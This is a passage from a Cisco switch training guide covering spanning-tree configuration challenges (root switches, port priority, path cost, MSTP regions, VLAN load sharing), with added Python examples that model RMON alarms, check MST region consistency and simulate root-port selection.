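    """Evaluate successive samples of a MIB variable as an RMON alarm does.

    With 'delta' the tested value is the change since the previous sample;
    with 'absolute' it is the sample itself. A rising crossing is reported
    when the tested value reaches or exceeds the rising threshold, and no
    further rising crossing is reported until the value has dropped to or
    below the falling threshold (and symmetrically for falling). That
    hysteresis stops a counter hovering near the threshold from producing
    an event storm."""

    def __init__(self, rising, falling, rising_event=None, falling_event=None,
                 sample_type="delta"):
        if falling > rising:
            raise ValueError("falling threshold must not exceed rising threshold")
        if sample_type not in ("delta", "absolute"):
            raise ValueError("sample_type must be 'delta' or 'absolute'")
        self.rising, self.falling = rising, falling
        self.events = {"rising": rising_event, "falling": falling_event}
        self.sample_type = sample_type
        self.prev = None        # last raw sample (needed for delta)
        self.armed = None       # None at startup: either crossing may fire first

    def sample(self, value):
        """Feed one sample. Return (crossing, event) when a threshold is
        crossed, else None; event is None if none was configured."""
        if self.sample_type == "delta":
            if self.prev is None:
                self.prev = value
                return None     # a delta needs two samples
            tested, self.prev = value - self.prev, value
        else:
            tested = value
        if tested >= self.rising and self.armed in (None, "rising"):
            self.armed = "falling"
            return ("rising", self.events["rising"])
        if tested <= self.falling and self.armed in (None, "falling"):
            self.armed = "rising"
            return ("falling", self.events["falling"])
        return None


def run_alarm(samples, **kwargs):
    """Replay a sequence of counter samples; one result per sample."""
    alarm = RmonAlarm(**kwargs)
    return [alarm.sample(s) for s in samples]


# Constructed ifOutErrors readings, one per 20 s sample interval.
SAMPLE_COUNTER = [100, 105, 130, 150, 150, 150, 170]

if __name__ == "__main__":
    results = run_alarm(SAMPLE_COUNTER, rising=15, falling=0, rising_event=1)
    for value, result in zip(SAMPLE_COUNTER, results):
        print(f"counter={value:4d} -> {result}")
```

The second rising crossing (delta 20 at sample 4) is suppressed until the delta has returned to the falling threshold of 0, which is exactly the behaviour the `falling-threshold 0` argument buys.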

Cisco Switch Challenge 41


Area: Switches STP (Spanning Tree Protocol)
Outline
This challenge involves disabling spanning-tree on a VLAN.
Objectives
The objectives of this challenge are to:

Disable spanning-tree on a specific VLAN.

The commands used are:


> enable
# config t
(config)# no spanning-tree vlan 1

Example
> enable
# config t
(config)# no spanning-tree ?
backbonefast Enable BackboneFast Feature
etherchannel Spanning tree etherchannel specific configuration
extend Spanning Tree 802.1t extensions
loopguard Spanning tree loopguard options
mode Spanning tree operating mode
mst Multiple spanning tree configuration
pathcost Spanning tree pathcost options
portfast Spanning tree portfast options
uplinkfast Enable UplinkFast Feature
vlan VLAN Switch Spanning Tree
(config)# no spanning-tree vlan ?
WORD vlan range, example: 1,3-5,7,9-11
(config)# no spanning-tree vlan 1 ?
forward-time Set the forward delay for the spanning tree
hello-time Set the hello interval for the spanning tree
max-age Set the max age interval for the spanning tree
priority Set the bridge priority for the spanning tree
root Configure switch as root
<cr>
(config)# no spanning-tree vlan 1

Cisco Switch Challenge 42


Area: Switches STP (Spanning Tree Protocol)
Outline
This challenge involves defining a primary root switch.
Objectives
The objectives of this challenge are to:

Define a primary root switch.

The commands used are:


> enable
# config t
(config)# spanning-tree vlan 1 root primary

Example
> enable
# config t
(config)# spanning-tree ?
backbonefast Enable BackboneFast Feature
etherchannel Spanning tree etherchannel specific configuration
extend Spanning Tree 802.1t extensions
loopguard Spanning tree loopguard options
mode Spanning tree operating mode
mst Multiple spanning tree configuration
pathcost Spanning tree pathcost options
portfast Spanning tree portfast options
uplinkfast Enable UplinkFast Feature
vlan VLAN Switch Spanning Tree
(config)# spanning-tree vlan ?
WORD vlan range, example: 1,3-5,7,9-11
(config)# spanning-tree vlan 1 root ?
primary Configure this switch as primary root for this spanning tree
secondary Configure switch as secondary root
(config)# spanning-tree vlan 1 root p ?
diameter Network diameter of this spanning tree
<cr>
(config)# spanning-tree v 1 r p ?
(config)# spanning-tree vlan 1 root primary

Cisco Switch Challenge 43


Area: Switches STP (Spanning Tree Protocol)
Outline
This challenge involves defining a secondary root switch which will take over from the
primary root switch if it fails.
Objectives
The objectives of this challenge are to:

Define a secondary root switch.

The commands used are:


> enable
# config t
(config)# spanning-tree vlan 1 root secondary

Example
> enable
# config t
(config)# spanning-tree ?
backbonefast Enable BackboneFast Feature
etherchannel Spanning tree etherchannel specific configuration
extend Spanning Tree 802.1t extensions
loopguard Spanning tree loopguard options
mode Spanning tree operating mode
mst Multiple spanning tree configuration
pathcost Spanning tree pathcost options
portfast Spanning tree portfast options
uplinkfast Enable UplinkFast Feature
vlan VLAN Switch Spanning Tree
(config)# spanning-tree vlan ?
WORD vlan range, example: 1,3-5,7,9-11
(config)# spanning-tree vlan 1 root ?
primary Configure this switch as primary root for this spanning tree
secondary Configure switch as secondary root
(config)# spanning-tree vlan 1 root secondary ?
diameter Network diameter of this spanning tree
<cr>
(config)# spanning-tree vlan 1 root secondary

Cisco Switch Challenge 44


Area: Switches STP (Spanning Tree Protocol)
Outline
This challenge involves defining port-priority and path cost for spanning-tree.
Objectives
The objectives of this challenge are to:

Define port-priority for spanning-tree.
Define path cost for spanning-tree.

The commands used are:


> enable
# config t
(config)# int fa0/1
(config-if)# spanning-tree cost 100
(config-if)# spanning-tree vlan 1 cost 100
(config-if)# spanning-tree vlan 1 port-priority 100
(config-if)# spanning-tree port-priority 100

Example
> enable
# config t
(config)# int fa0/1
Switch(config-if)# spanning-tree ?
bpdufilter Don't send or receive BPDUs on this interface
bpduguard Don't accept BPDUs on this interface
cost Change an interface's spanning tree port path cost
guard Change an interface's spanning tree guard mode
link-type Specify a link type for spanning tree protocol use
mst Multiple spanning tree
port-priority Change an interface's spanning tree port priority
portfast Enable an interface to move directly to forwarding on link up
stack-port Enable stack port
vlan VLAN Switch Spanning Tree
(config-if)# spanning-tree cost ?
<1-200000000> port path cost
(config-if)# spanning-tree cost 100
(config-if)# spanning-tree v 1 ?
cost Change an interface's per VLAN spanning tree path cost
port-priority Change an interface's spanning tree port priority
(config-if)# spanning-tree vlan 1 cost ?
<1-200000000> Change an interface's per VLAN spanning tree path cost
(config-if)# spanning-tree vlan 1 cost 100
(config-if)# spanning-tree port- ?
<0-240> port priority in increments of 16
(config-if)# spanning-tree port-priority 100
(config-if)# spanning-tree vlan 1 p ?
<0-240> port priority in increments of 16
(config-if)# spanning-tree vlan 1 port-priority 100

Cisco Switch Challenge 45


Area: Switches STP (Spanning Tree Protocol)
Outline
This challenge involves defining port-priority and path cost for spanning-tree, along with the hello-time and forward-time.
Objectives
The objectives of this challenge are to:

Define port-priority for spanning-tree.
Define path cost for spanning-tree.
Define spanning-tree hello-time.
Define spanning-tree forward-time.

The commands used are:


> enable
# config t
(config)# spanning-tree vlan 1 forward-time 10
(config)# spanning-tree vlan 1 hello-time 10
(config)# spanning-tree vlan 1 max-age 10
(config)# int fa0/1
(config-if)# spanning-tree cost 100
(config-if)# spanning-tree vlan 1 cost 100
(config-if)# spanning-tree vlan 1 port-priority 100
(config-if)# spanning-tree port-priority 100

Example
> enable
# config t
(config)# spanning-tree vlan ?
WORD vlan range, example: 1,3-5,7,9-11
(config)# spanning-tree vlan ANY ?
forward-time Set the forward delay for the spanning tree
hello-time Set the hello interval for the spanning tree
max-age Set the max age interval for the spanning tree
priority Set the bridge priority for the spanning tree
root Configure switch as root
<cr>
(config)# spanning-tree vlan 1 forward-time ?
<4-30> number of seconds for the forward delay timer
(config)# spanning-tree vlan 1 forward-time 10
(config)# spanning-tree vlan 1 hello-time ?
<1-10> number of seconds between generation of config BPDUs
(config)# spanning-tree vlan 1 hello-time 10
(config)# spanning-tree vlan 1 m ?
<6-40> maximum number of seconds the information in a BPDU is valid
(config)# spanning-tree vlan 1 max-age 10
(config)# int fa0/1
Switch(config-if)# spanning-tree ?
bpdufilter Don't send or receive BPDUs on this interface
bpduguard Don't accept BPDUs on this interface
cost Change an interface's spanning tree port path cost
guard Change an interface's spanning tree guard mode
link-type Specify a link type for spanning tree protocol use
mst Multiple spanning tree
port-priority Change an interface's spanning tree port priority
portfast Enable an interface to move directly to forwarding on link up
stack-port Enable stack port
vlan VLAN Switch Spanning Tree
(config-if)# spanning-tree cost ?
<1-200000000> port path cost
(config-if)# spanning-tree cost 100
(config-if)# spanning-tree v 1 ?
cost Change an interface's per VLAN spanning tree path cost
port-priority Change an interface's spanning tree port priority
(config-if)# spanning-tree vlan 1 cost ?
<1-200000000> Change an interface's per VLAN spanning tree path cost
(config-if)# spanning-tree vlan 1 cost 100
(config-if)# spanning-tree port- ?
<0-240> port priority in increments of 16
(config-if)# spanning-tree port-priority 100
(config-if)# spanning-tree vlan 1 p ?
<0-240> port priority in increments of 16
(config-if)# spanning-tree vlan 1 port-priority 100

Cisco Switch Challenge 46 (MSTP/RSTP)


Area: Switches - RSTP and MSTP
Outline
This challenge involves configuring MSTP and RSTP. RSTP (Rapid Spanning Tree Protocol,
IEEE 802.1w) and MSTP (Multiple STP, IEEE 802.1s) are used to provide rapid
convergence of the spanning-tree protocol. RSTP is the part that allows for rapid
convergence, and MSTP is used to group VLANs into a single spanning-tree instance. RSTP
can converge the spanning-tree instance in less than a second, as opposed to almost 50
seconds for standard 802.1D spanning tree. This type of setup is important for real-time
applications such as voice and video traffic.
Objectives
The objectives of this challenge are to:

Define MST details.
Enable MSTP and RSTP for rapid convergence of the spanning-tree.

The commands used are:


> enable
# config t
(config)# spanning-tree mst configuration
(config-mst)# instance 1 v 1
(config-mst)# name fred
(config-mst)# revision 1
(config-mst)# exit
(config)# spanning-tree mode mst

Example
> enable
# config t
(config)# spanning-tree ?
backbonefast Enable BackboneFast Feature
etherchannel Spanning tree etherchannel specific configuration
extend Spanning Tree 802.1t extensions
loopguard Spanning tree loopguard options
mode Spanning tree operating mode
mst Multiple spanning tree configuration
pathcost Spanning tree pathcost options
portfast Spanning tree portfast options
uplinkfast Enable UplinkFast Feature
vlan VLAN Switch Spanning Tree
(config)# spanning-tree mst ?
WORD MST instance range, example: 0-3,5,7-9
configuration Enter MST configuration submode
forward-time Set the forward delay for the spanning tree
hello-time Set the hello interval for the spanning tree
max-age Set the max age interval for the spanning tree
max-hops Set the max hops value for the spanning tree
(config)# spanning-tree mst configuration ?
<cr>
(config)# spanning-tree mst configuration
(config-mst)# ?
abort Exit region configuration mode, aborting changes
exit Exit region configuration mode, applying changes
instance Map vlans to an MST instance
name Set configuration name
no Negate a command or set its defaults
private-vlan Set private-vlan synchronization
revision Set configuration revision number
show Display region configurations
(config-mst)# instance ?
<0-15> MST instance id
(config-mst)# instance 1 ?
vlan Range of vlans to add to the instance mapping
(config-mst)# instance 1 vlan ?
LINE vlan range ex: 1-65, 72, 300 -200
(config-mst)# instance 1 vlan 1
(config-mst)# name ?
WORD Configuration name
(config-mst)# name fred
(config-mst)# revision ?
<0-65535> Configuration revision number
(config-mst)# revision 1
(config-mst)# exit
(config)# spanning-tree mode ?
mst Multiple spanning tree mode
pvst Per-Vlan spanning tree mode
rapid-pvst Per-Vlan rapid spanning tree mode
(config)# spanning-tree mode mst

Notes
The command:
(config)# spanning-tree mode mst

enables both MSTP and RSTP. All the switches in the MST region require the same
configuration for their MST settings.

The default parameters for RSTP and MSTP are:

Spanning-tree mode: PVST (MSTP and RSTP disabled)
Switch priority: 32768
Spanning-tree port priority: 128
Spanning-tree cost: 4 (1Gbps), 19 (100Mbps), 100 (10Mbps)
Hello time: 2 seconds
Forward-delay time: 15 seconds
Maximum-aging time: 20 seconds
Maximum hop count: 20 hops
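The Notes say every switch in the region must carry the same MST configuration. This added example (not NetworkSims code) parses the `spanning-tree mst configuration` block from three constructed switch configs and groups the switches by region, so a mismatch such as SW3's deliberately wrong revision number stands out; the switch names and configs are constructed.

```python
"""Check that several switches agree on their MST region. A region is defined
by three things: the configuration name, the revision number and the
VLAN-to-instance mapping (VLANs not mapped to any instance belong to
instance 0). Added example for this page, not NetworkSims code. The three
configs below are constructed; SW3 carries a deliberate revision mismatch."""

SWITCH_CONFIGS = {
    "SW1": """\
spanning-tree mode mst
spanning-tree mst configuration
 name fred
 revision 1
 instance 1 vlan 1-65, 72
!
""",
    "SW2": """\
spanning-tree mode mst
spanning-tree mst configuration
 name fred
 revision 1
 instance 1 vlan 1-65,72
!
""",
    "SW3": """\
spanning-tree mode mst
spanning-tree mst configuration
 name fred
 revision 2
 instance 1 vlan 1-65, 72
!
""",
}


def parse_vlan_range(spec):
    """Expand the IOS range syntax '1-65, 72, 300-400' into a set of VLAN IDs."""
    vlans = set()
    for part in spec.replace(" ", "").split(","):
        if not part:
            continue
        lo, _, hi = part.partition("-")
        lo, hi = int(lo), int(hi or lo)
        if not 1 <= lo <= hi <= 4094:
            raise ValueError(f"bad VLAN range: {part}")
        vlans.update(range(lo, hi + 1))
    return vlans


def parse_mst_config(text):
    """Extract name, revision and the vlan->instance map from a running-config."""
    name, revision, mapping, in_block = "", 0, {}, False
    for raw in text.splitlines():
        line = raw.rstrip()
        if line == "spanning-tree mst configuration":
            in_block = True
            continue
        if not in_block:
            continue
        if not line.startswith(" "):
            in_block = False          # the submode ends at the next top-level line
            continue
        words = line.split()
        if words[0] == "name":
            name = words[1]
        elif words[0] == "revision":
            revision = int(words[1])
        elif words[0] == "instance" and len(words) > 3 and words[2] == "vlan":
            for vlan in parse_vlan_range(" ".join(words[3:])):
                mapping[vlan] = int(words[1])
    return {"name": name, "revision": revision, "mapping": mapping}


def region_key(cfg):
    """Hashable identity of a region: name, revision and the full 1-4094 table."""
    table = tuple(cfg["mapping"].get(v, 0) for v in range(1, 4095))
    return (cfg["name"], cfg["revision"], table)


def group_regions(configs):
    """Return a list of switch-name lists, one per distinct region."""
    regions = {}
    for switch, text in configs.items():
        regions.setdefault(region_key(parse_mst_config(text)), []).append(switch)
    return list(regions.values())


def mismatched(configs, reference):
    """Switches whose region differs from the reference switch's region."""
    ref = region_key(parse_mst_config(configs[reference]))
    return [s for s, t in configs.items()
            if s != reference and region_key(parse_mst_config(t)) != ref]


if __name__ == "__main__":
    print("regions:", group_regions(SWITCH_CONFIGS))
    print("differ from SW1:", mismatched(SWITCH_CONFIGS, "SW1"))
```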

Cisco Switch Challenge 47 (Primary root switch)


Area: Switches - RSTP and MSTP
Outline
This challenge involves configuring a primary root switch for a given instance.
Objectives
The objectives of this challenge are to:

Define a primary root.
Define MST parameters on the interface, such as cost and port-priority.
Define global MST parameters, such as hello time, forward-time, maximum age,
maximum hops and priority.

The commands used are:


> enable
# config t
(config)# spanning-tree mst 1 root primary
(config)# spanning-tree mst hello-time 10
(config)# spanning-tree mst forward-time 10
(config)# spanning-tree mst 1 priority 10
(config)# spanning-tree mst max-age 10
(config)# spanning-tree mst max-hops 10
(config)# int fa0/1
(config-if)# spanning-tree mst 1 cost 10
(config-if)# spanning-tree mst 1 port-priority 10

Example
> enable
# config t
(config)# spanning-tree mst ?
WORD MST instance range, example: 0-3,5,7-9
configuration Enter MST configuration submode
forward-time Set the forward delay for the spanning tree
hello-time Set the hello interval for the spanning tree
max-age Set the max age interval for the spanning tree
max-hops Set the max hops value for the spanning tree
(config)# spanning-tree mst 1 ?
priority Set the bridge priority for the spanning tree
root Configure switch as root
(config)# spanning-tree mst 1 root ?
primary Configure this switch as primary root for this spanning tree
secondary Configure switch as secondary root
(config)# spanning-tree mst 1 root primary
(config)# spanning-tree mst hello-time ?
<1-10> number of seconds between generation of config BPDUs
(config)# spanning-tree mst hello-time 10
(config)# spanning-tree mst forward-time ?
<4-30> number of seconds for the forward delay timer
(config)# spanning-tree mst forward-time 10
(config)# spanning-tree mst 1 ?
priority Set the bridge priority for the spanning tree
root Configure switch as root
(config)# spanning-tree mst 1 priority ?
<0-61440> bridge priority in increments of 4096
(config)# spanning-tree mst 1 priority 10
(config)# spanning-tree mst max-age ?
<6-40> maximum number of seconds the information in a BPDU is valid
(config)# spanning-tree mst max-hops ?
<1-40> maximum number of hops a BPDU is valid
(config)# spanning-tree mst max-age 10
(config)# spanning-tree mst max-hops 10
(config)# int fa0/1
(config-if)# spanning-tree mst ?
WORD MST instance list, example 0,2-4,6,8-12
(config-if)# spanning-tree mst 1 ?
cost Change the interface spanning tree path cost for an instance
port-priority Change the spanning tree port priority for an instance
(config-if)# spanning-tree mst 1 cost ?
<1-200000000> Change the interface spanning tree path cost for an instance
(config-if)# spanning-tree mst 1 port-priority ?
<0-240> port priority in increments of 16
(config-if)# spanning-tree mst 1 cost 10
(config-if)# spanning-tree mst 1 port-priority 10

Cisco Switch Challenge 48 (Secondary root switch)


Area: Switches - RSTP and MSTP
Outline
This challenge involves configuring a secondary root switch for a given instance.
Objectives
The objectives of this challenge are to:

Define a secondary root.
Define MST parameters on the interface, such as cost and port-priority.
Define global MST parameters, such as hello time, forward-time, maximum age,
maximum hops and priority.

The commands used are:


> enable
# config t
(config)# spanning-tree mst 1 root secondary
(config)# spanning-tree mst hello-time 10
(config)# spanning-tree mst forward-time 10
(config)# spanning-tree mst 1 priority 10
(config)# spanning-tree mst max-age 10
(config)# spanning-tree mst max-hops 10
(config)# int fa0/1
(config-if)# spanning-tree mst 1 cost 10
(config-if)# spanning-tree mst 1 port-priority 10

Example
> enable
# config t
(config)# spanning-tree mst ?
WORD MST instance range, example: 0-3,5,7-9
configuration Enter MST configuration submode
forward-time Set the forward delay for the spanning tree
hello-time Set the hello interval for the spanning tree
max-age Set the max age interval for the spanning tree
max-hops Set the max hops value for the spanning tree
(config)# spanning-tree mst 1 ?
priority Set the bridge priority for the spanning tree
root Configure switch as root
(config)# spanning-tree mst 1 root ?
primary Configure this switch as primary root for this spanning tree
secondary Configure switch as secondary root
(config)# spanning-tree mst 1 root secondary
(config)# spanning-tree mst hello-time ?
<1-10> number of seconds between generation of config BPDUs
(config)# spanning-tree mst hello-time 10
(config)# spanning-tree mst forward-time ?
<4-30> number of seconds for the forward delay timer
(config)# spanning-tree mst forward-time 10
(config)# spanning-tree mst 1 ?
priority Set the bridge priority for the spanning tree
root Configure switch as root
(config)# spanning-tree mst 1 priority ?
<0-61440> bridge priority in increments of 4096
(config)# spanning-tree mst 1 priority 10
(config)# spanning-tree mst max-age ?
<6-40> maximum number of seconds the information in a BPDU is valid
(config)# spanning-tree mst max-hops ?
<1-40> maximum number of hops a BPDU is valid
(config)# spanning-tree mst max-age 10
(config)# spanning-tree mst max-hops 10
(config)# int fa0/1
(config-if)# spanning-tree mst ?
WORD MST instance list, example 0,2-4,6,8-12
(config-if)# spanning-tree mst 1 ?
cost Change the interface spanning tree path cost for an instance
port-priority Change the spanning tree port priority for an instance
(config-if)# spanning-tree mst 1 cost ?
<1-200000000> Change the interface spanning tree path cost for an instance
(config-if)# spanning-tree mst 1 port-priority ?
<0-240> port priority in increments of 16
(config-if)# spanning-tree mst 1 cost 10
(config-if)# spanning-tree mst 1 port-priority 10

Cisco Switch Challenge 49


Area: Switches Load Sharing with STP port-priorities
Outline
It is possible to create more than one trunk route and share traffic between them.
Unfortunately loops can occur, so STP is used to avoid these. In this case port-priorities are
defined for each VLAN, so that specific VLANs take one of the trunk routes.
Objectives
The objectives of this challenge are to:

Define VTP details.
Define trunk ports (two, in this case).
Define port-priority for the trunk ports.

The commands used are:


> enable
# config t
(config)# vtp domain test
(config)# vtp mode server
(config)# int fa0/6
(config-if)# spanning-tree vlan 10 port-priority 10
(config-if)# spanning-tree vlan 11 port-priority 10
(config-if)# spanning-tree vlan 12 port-priority 10
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# exit
(config)# int fa0/10
(config-if)# spanning-tree vlan 13 port-priority 10
(config-if)# spanning-tree vlan 14 port-priority 10
(config-if)# spanning-tree vlan 15 port-priority 10
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk

Example
> enable
# config t
(config)# vtp ?
domain Set the name of the VTP administrative domain.
file Configure IFS filesystem file where VTP configuration is stored.
interface Configure interface as the preferred source for the VTP IP updater address.
mode Configure VTP device mode
password Set the password for the VTP administrative domain
pruning Set the adminstrative domain to permit pruning
version Set the adminstrative domain to VTP version
(config)# vtp domain ?
WORD The ascii name for the VTP administrative domain.
(config)# vtp domain test
(config)# vtp mode ?
client Set the device to client mode.
server Set the device to server mode.
transparent Set the device to transparent mode.
(config)# vtp mode server
(config)# int fa0/6
(config-if)# spanning-tree ?
bpdufilter Don't send or receive BPDUs on this interface
bpduguard Don't accept BPDUs on this interface
cost Change an interface's spanning tree port path cost
guard Change an interface's spanning tree guard mode
link-type Specify a link type for spanning tree protocol use
mst Multiple spanning tree
port-priority Change an interface's spanning tree port priority
portfast Enable an interface to move directly to forwarding on link up
stack-port Enable stack port
vlan VLAN Switch Spanning Tree
(config-if)# spanning-tree vlan ?
WORD vlan range, example: 1,3-5,7,9-11
(config-if)# spanning-tree vlan 10 ?
cost Change an interface's per VLAN spanning tree path cost
port-priority Change an interface's spanning tree port priority
(config-if)# spanning-tree vlan 10 cost ?
<1-200000000> Change an interface's per VLAN spanning tree path cost
(config-if)# spanning-tree vlan 10 port-priority ?
<0-240> port priority in increments of 16
(config-if)# spanning-tree vlan 10 port-priority 10
(config-if)# spanning-tree vlan 11 port-priority 10
(config-if)# spanning-tree vlan 12 port-priority 10
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# exit
(config)# int fa0/10
(config-if)# spanning-tree vlan 13 port-priority 10
(config-if)# spanning-tree vlan 14 port-priority 10
(config-if)# spanning-tree vlan 15 port-priority 10
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk

Note the default port-priority is 128. Thus in this example the port priorities for the first
trunk will be:
VLAN 10: 10
VLAN 11: 10
VLAN 12: 10
VLAN 13: 128
VLAN 14: 128
VLAN 15: 128
And for the second trunk:
VLAN 10: 128
VLAN 11: 128
VLAN 12: 128
VLAN 13: 10
VLAN 14: 10
VLAN 15: 10
Thus the lower priority will be taken, so VLANs 10, 11 and 12 will go through Trunk 1, and
VLANs 13, 14 and 15 will go through Trunk 2. If either of the trunks fails, the traffic which
would normally go through the failed trunk will use the other trunk. In this way there is a
fail-back solution, along with load balancing.

Cisco Switch Challenge 50


Area: Switches Load Sharing with STP costs.
Outline
It is possible to create more than one trunk route and share traffic between them.
Unfortunately loops can occur, so STP is used to avoid these. In this case costs are
defined for each VLAN, so that specific VLANs take one of the trunk routes.
Objectives
The objectives of this challenge are to:

Define VTP details.
Define trunk ports (two, in this case).
Define cost values for the trunk ports.

The commands used are:


> enable
# config t
(config)# vtp domain test
(config)# vtp mode server
(config)# int fa0/6
(config-if)# spanning-tree vlan 10 cost 10
(config-if)# spanning-tree vlan 11 cost 10
(config-if)# spanning-tree vlan 12 cost 10
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# exit
(config)# int fa0/10
(config-if)# spanning-tree vlan 13 cost 10
(config-if)# spanning-tree vlan 14 cost 10
(config-if)# spanning-tree vlan 15 cost 10
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk

Example
> enable
# config t
(config)# vtp domain test
(config)# vtp mode server
(config)# int fa0/6
(config-if)# spanning-tree vlan 10 cost 10
(config-if)# spanning-tree vlan 11 cost 10
(config-if)# spanning-tree vlan 12 cost 10
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# exit
(config)# int fa0/10
(config-if)# spanning-tree vlan 13 cost 10
(config-if)# spanning-tree vlan 14 cost 10
(config-if)# spanning-tree vlan 15 cost 10
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk

Note the default path cost of a 100 Mb/s port is 19. Thus in this example the cost for the first trunk will be:
VLAN 10 10
VLAN 11 10
VLAN 12 10
VLAN 13 19
VLAN 14 19
VLAN 15 19
And for the second trunk:

VLAN 10 19
VLAN 11 19
VLAN 12 19
VLAN 13 10
VLAN 14 10
VLAN 15 10
The lower cost wins, so VLANs 10, 11 and 12 will go through Trunk 1 and VLANs 13, 14 and 15 through Trunk 2. If either trunk fails, the traffic which would normally use it moves to the other trunk. This gives failover along with load sharing. Unlike port priority, path cost is added by the switch on which it is configured, so these commands go on the downstream switch whose root-port choice is being steered.
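The per-VLAN root-port choice described in Challenges 49 and 50 can be checked offline before touching the switches. The following Python script is an added example and not part of the NetworkSims material: it parses the spanning-tree vlan ... cost and ... port-priority lines of the two-trunk configurations above, applies the root-port selection order for a switch whose two uplinks reach the same upstream bridge, and then fails one trunk to show every VLAN moving to the other. The default cost of 19 and port priority of 128 are taken from the text; the port-number tie-breaker, the single-upstream-bridge assumption and the sample configuration are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field

DEFAULT_COST = 19            # 100 Mb/s port, short path-cost method (as on the page)
DEFAULT_PORT_PRIORITY = 128  # IOS default port priority (as on the page)


@dataclass
class Uplink:
    name: str
    port_number: int                                   # last-resort tie-breaker (port ID)
    up: bool = True
    cost: dict = field(default_factory=dict)           # vlan -> configured path cost
    port_priority: dict = field(default_factory=dict)  # vlan -> neighbour's port priority

    def selection_key(self, vlan):
        # Root-port selection for a switch whose uplinks all lead to the same upstream
        # bridge: lowest root path cost, then lowest sender port priority (the
        # port-priority configured on the upstream switch, as in Challenge 49), then
        # lowest sender port ID. The bridge-ID comparison is skipped because both
        # uplinks terminate on the same bridge in this topology (an assumption).
        return (self.cost.get(vlan, DEFAULT_COST),
                self.port_priority.get(vlan, DEFAULT_PORT_PRIORITY),
                self.port_number)


INT_RE = re.compile(r"^\s*(?:\(config\)#\s*)?int(?:erface)?\s+(\S+)", re.I)
STP_RE = re.compile(
    r"^\s*(?:\(config-if\)#\s*)?spanning-tree\s+vlan\s+(\d+)\s+(cost|port-priority)\s+(\d+)",
    re.I)


def parse_uplinks(config_text):
    """Collect per-VLAN cost / port-priority settings from IOS-style config lines."""
    uplinks, current = {}, None
    for line in config_text.splitlines():
        m = INT_RE.match(line)
        if m:
            name = m.group(1).lower()
            current = uplinks.setdefault(name, Uplink(name, int(name.rsplit("/", 1)[-1])))
            continue
        m = STP_RE.match(line)
        if m and current is not None:
            vlan, knob, value = int(m.group(1)), m.group(2).lower(), int(m.group(3))
            (current.cost if knob == "cost" else current.port_priority)[vlan] = value
    return list(uplinks.values())


def root_port(uplinks, vlan):
    """Name of the uplink this VLAN forwards on, or None if every uplink is down."""
    live = [u for u in uplinks if u.up]
    return min(live, key=lambda u: u.selection_key(vlan)).name if live else None


def forwarding_map(uplinks, vlans):
    return {v: root_port(uplinks, v) for v in vlans}


# Constructed sample: the two-trunk, cost-based configuration of Challenge 50.
SAMPLE_CONFIG = """
(config)# int fa0/6
(config-if)# spanning-tree vlan 10 cost 10
(config-if)# spanning-tree vlan 11 cost 10
(config-if)# spanning-tree vlan 12 cost 10
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport mode trunk
(config-if)# exit
(config)# int fa0/10
(config-if)# spanning-tree vlan 13 cost 10
(config-if)# spanning-tree vlan 14 cost 10
(config-if)# spanning-tree vlan 15 cost 10
"""

if __name__ == "__main__":
    links = parse_uplinks(SAMPLE_CONFIG)
    print("both trunks up:", forwarding_map(links, range(10, 16)))
    links[0].up = False            # Fa0/6 fails: every VLAN moves to Fa0/10
    print("fa0/6 down:    ", forwarding_map(links, range(10, 16)))
```

The same parser handles the port-priority variant of Challenge 49: feed it the two trunk configurations with spanning-tree vlan N port-priority lines and the selection falls through to the second element of the key.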

Cisco Switch Challenge 51


Outline
This challenge involves the configuration of MST (Multiple Spanning Tree, IEEE 802.1s), in which VLANs are mapped to instances inside a named region. Switches only join the same region when the configuration name, the revision number and the complete VLAN-to-instance mapping all match, so all three must be entered identically on every switch of the region.
Objectives
The objectives of this challenge are to:

Define MST.

Example
Switch(config)# spanning-tree mst ?
  WORD           MST instance range, example: 0-3,5,7-9
  configuration  Enter MST configuration submode
  forward-time   Set the forward delay for the spanning tree
  hello-time     Set the hello interval for the spanning tree
  max-age        Set the max age interval for the spanning tree
  max-hops       Set the max hops value for the spanning tree
Switch(config)# spanning-tree mst configuration
Switch(config-mst)# ?
  abort         Exit region configuration mode, aborting changes
  exit          Exit region configuration mode, applying changes
  instance      Map vlans to an MST instance
  name          Set configuration name
  no            Negate a command or set its defaults
  private-vlan  Set private-vlan synchronization
  revision      Set configuration revision number
  show          Display region configurations
Switch(config-mst)# instance ?
  <0-15>  MST instance id
Switch(config-mst)# instance 1 ?
  vlan  Range of vlans to add to the instance mapping
Switch(config-mst)# instance 1 vlan ?
  LINE  vlan range ex: 1-65, 72, 300 -200
Switch(config-mst)# instance 1 vlan 10
Switch(config-mst)# name ?
  WORD  Configuration name
Switch(config-mst)# name region1
Switch(config-mst)# revision ?
  <0-65535>  Configuration revision number
Switch(config-mst)# revision 1
Switch(config-mst)# show pending
Pending MST configuration
Name      [region1]
Revision  1
Instance  Vlans mapped
--------  -------------------------------------------------------------------
0         1-9,11-4094
1         10
-------------------------------------------------------------------------------
Switch(config-mst)#

The mapping shown by show pending is only applied when the submode is left with exit; abort discards it. Every VLAN not mapped explicitly stays in instance 0, the IST.
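Because a region is only formed when name, revision and the full VLAN-to-instance table agree, a mismatch between two switches is a configuration error that the CLI does not flag. The following Python script is an added example, not part of the NetworkSims page: it parses spanning-tree mst configuration submode transcripts like the one above (including abort, which discards the pending changes) into a complete 1-4094 mapping with unmapped VLANs in instance 0, and reports why two switches would not share a region. The second transcript, SWITCH_B, is constructed for the example.

```python
import re

VLAN_MIN, VLAN_MAX = 1, 4094


def expand_vlan_list(spec):
    """Expand an IOS VLAN list such as '1-65,72' (spaces tolerated) into a set of ints."""
    vlans = set()
    for part in spec.replace(" ", "").split(","):
        if not part:
            continue
        lo, _, hi = part.partition("-")
        lo, hi = int(lo), int(hi or lo)
        if not VLAN_MIN <= lo <= hi <= VLAN_MAX:
            raise ValueError(f"bad VLAN range: {part}")
        vlans.update(range(lo, hi + 1))
    return vlans


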